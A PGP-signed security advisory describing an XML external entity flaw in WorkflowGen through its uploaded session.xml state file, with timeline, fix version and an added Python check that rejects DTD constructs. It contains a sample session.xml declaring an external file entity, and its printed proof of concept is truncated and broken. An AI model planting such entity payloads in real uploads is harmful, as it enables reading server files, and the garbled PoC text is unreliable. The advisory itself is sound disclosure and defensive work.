-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2025-052
Product: WorkflowGen
Manufacturer: Advantys Solutions Ltd
Affected Version(s): 9.0.7 - 9.2.9
Tested Version(s): 9.0.7
Vulnerability Type: Improper Restriction of XML External Entity Reference (CWE-611)
Risk Level: Medium
Solution Status: Fixed
Manufacturer Notification: 2025-08-11
Public Disclosure: 2025-09-29
CVE Reference: Not yet assigned
Author of Advisory: Dennis Kurz, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

WorkflowGen is an application to automate processes.

The manufacturer describes the product as follows (see [1]):

"WorkflowGen offers a low-code/no-code platform to automate complex,
human-centric processes enhanced by AI agents, providing high
configurability."

Due to an insecure configuration of the XML parser, the application is
vulnerable to external entity injection.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The security configuration of the XML parser allows the definition and
loading of external entities when parsing XML files using a specific
function.

This can be exploited by uploading a malicious XML file and initiating a
process instance with parameters that point to the uploaded file
(cf. SySS Security Advisory SYSS-2025-053).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The upload function of a form can be used to upload the malicious XML
file. After the upload, the process instance can be restarted with
parameters that point to the uploaded file.

An XXE injection is achieved using the session.xml state file. The
session.xml file is parsed when one step of the form is finished.

With the following session.xml file, a successful XXE injection can be
achieved:

"> ]>
[...]
&xxe;

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The vendor has released version 9.2.10, which addresses this
vulnerability. It is advised to upgrade to version 9.2.10 or later.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-07-21: Vulnerability discovered
2025-08-11: Vulnerability reported to manufacturer
2025-08-26: Enquiry about the status of the vulnerability
2025-09-04: Solution provided with release of version 9.2.10
2025-09-05: Enquiry about the status of the vulnerability
2025-09-17: Confirmation from a customer that an update was provided
2025-09-22: Enquiry for confirmation that the vulnerabilities were
            addressed by the update
2025-09-29: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for WorkflowGen
    https://www.workflowgen.com
[2] SySS Security Advisory SYSS-2025-052
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-052.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Dennis Kurz of SySS GmbH.

E-Mail: dennis.kurz@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Dennis_Kurz.asc
Key ID: 0x75CC91B4103E513B
Key Fingerprint: 0B17 953A 516B B560 C4F7 8EB1 75CC 91B4 103E 513B

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.
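As an added illustration of the mitigation for the parser misconfiguration described under Vulnerability Details: the check below is example code written for this page, not WorkflowGen code and not the vendor's fix. WorkflowGen's own XML parser is not Python; the example shows the principle a defender applies in front of any parser that reads uploaded state files such as session.xml, namely to refuse DOCTYPE and entity declarations and never to fetch an external entity. The two session.xml samples, their element names and the SYSTEM identifier are constructed placeholders.

```python
import xml.parsers.expat as expat
import xml.etree.ElementTree as ET

# Constructed sample of an uploaded state file that declares an external
# general entity (the CWE-611 pattern). Element names and the SYSTEM
# identifier are placeholders made up for this example.
UNSAFE_SESSION_XML = b"""<?xml version="1.0"?>
<!DOCTYPE session [
  <!ENTITY xxe SYSTEM "file:///placeholder/sensitive-file">
]>
<session><step>&xxe;</step></session>
"""

# Constructed benign state file of the same shape, without any DTD.
SAFE_SESSION_XML = b"""<?xml version="1.0"?>
<session><step>finished</step></session>
"""


class DtdNotAllowed(ValueError):
    """Untrusted XML carried a DOCTYPE, an entity declaration or an
    external entity reference; a state file needs none of these."""


def find_dtd_constructs(data: bytes) -> list:
    """Scan the document with expat and record DTD-related constructs
    without expanding or fetching anything. Returns a list of tuples,
    empty when the document is free of DTD constructs."""
    findings = []
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings.append(("doctype", name))

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        # sysid is set for SYSTEM/PUBLIC (external) entities, None otherwise.
        findings.append(("entity", name, sysid))

    def on_external_ref(context, base, sysid, pubid):
        # Called when content references an external entity. Record it and
        # return 1 (continue) WITHOUT creating a child parser, so the
        # SYSTEM identifier is never opened.
        findings.append(("external-ref", sysid))
        return 1

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.Parse(data, True)
    return findings


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Hardened entry point: refuse any DTD construct, then parse."""
    findings = find_dtd_constructs(data)
    if findings:
        raise DtdNotAllowed(f"rejected DTD constructs: {findings}")
    return ET.fromstring(data)


def classify(data: bytes) -> str:
    """Short verdict string for a given state file."""
    try:
        root = parse_untrusted_xml(data)
    except DtdNotAllowed as exc:
        return f"rejected: {exc}"
    return f"parsed: <{root.tag}>"


if __name__ == "__main__":
    print(classify(SAFE_SESSION_XML))    # parsed: <session>
    print(classify(UNSAFE_SESSION_XML))  # rejected: ...
```

The scan uses the parser's own DTD callbacks rather than a regular expression on the raw bytes, so it is not fooled by encoding tricks or by the string "DOCTYPE" appearing inside a comment, and the external-entity callback returns without opening the referenced location. The same policy exists as a single setting in most XML libraries; in .NET, for example, it is XmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit together with a null XmlResolver.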
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0
URL: https://creativecommons.org/licenses/by/4.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEECxeVOlFrtWDE946xdcyRtBA+UTsFAmjaRlAACgkQdcyRtBA+
UTvunw/8Dw3vDWC+6Ld6b0yaA3yNijFp0pajD8ZFYxa3Ej6uOQRn+23lmo/CqMc0
c6N1folHjUG3bccqY1ZihX/jRNrUWQmDG7EwB1ub1MX9xmwmceXynDcHogBlTxfh
C9dVQpfWDK6m1Q1GUy70oHF2gxMXtxapsKaJR+Kz+/7swRVqfIVyelh1+uHH2wg/
opGU1gGIcWE6ifVrYNI2I48no3AqwK81VfzHVJuKXPb+h8ipN4WQKPLBanZS5vp5
KJfqL40J+bpLraMOmWjIcWdtzhIPrPaWPi0MbspVGWUUWnUUi7fAam0/szOETsOI
Sm0RY7BSv3YHOwdTrASKBU8xi6zfcVaoZ6QruRDzkvxvhzlJispRw9MllWkQ+sih
Kvm2TTG92+pSxVq2CtGbww4ytVfg3XEHjR9pxVHOYp7rc9xTF83OL9xl1Qim1HnX
JVthYfILww3eUflah/OsEHqkBv9EKHMm8HkzP+p/WXw8DZjcXXOKs0c+MITWxq5D
VSV8FZ62I3f72iGiOdlmKSu9+DIUkc6t2TpkyKDqDLK5hDo3kVHHjoSkRXtAsjBF
SC3kZQHXg/+2PBxY2h5Iht7ETYZuCQU6CaA8DCgthw1NbJbzDw/R45zVg1jN77sd
8YljgRSUH/1OiSTLoILXwMrDgq1Y025dNbQrQ556gzKax5drDp0=
=65zA
-----END PGP SIGNATURE-----